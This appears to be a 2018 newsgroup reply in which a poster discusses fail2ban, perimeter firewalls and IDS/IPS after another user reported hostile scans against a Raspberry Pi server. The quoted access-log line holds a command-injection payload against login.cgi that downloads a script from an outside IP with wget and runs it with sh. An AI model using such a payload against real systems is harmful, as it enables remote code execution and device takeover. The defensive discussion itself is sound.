On 2018 Jun 21 12:40:56, you wrote to Jan Panteltje:

 >> I have been watching traffic for a while now to the raspi server after I
 >> posted the link, and see Russian and other countries hackers trying
 >> things, looking for a way to cause havoc: 31.207.194.8 - -
 >> [21/Jun/2018:10:45:37 +0200] "GET
 >> /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/t
 >> mp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 499 "-" "Hello, World"

 AN> This is what fail2ban was made for.

there are much better solutions than fail2ban...

plus, if Jan's server does not have a vulnerable "login.cgi" file, there's
nothing to worry about in the first place...

 AN> No need to fiddle with iptables.

agreed... let a proper solution do that and drop unwanted traffic at the
perimeter firewall where it deserves to be dropped... why burden the network
with unwanted traffic and burden the machine with having to run f2b... stop
unwanted traffic where it attempts to enter and don't look back ;)

)\/(ark

Always Mount a Scratch Monkey
Do you manage your own servers? If you are not running an IDS/IPS yer doin' it
wrong...
... BEER: It's not just for breakfast anymore.
---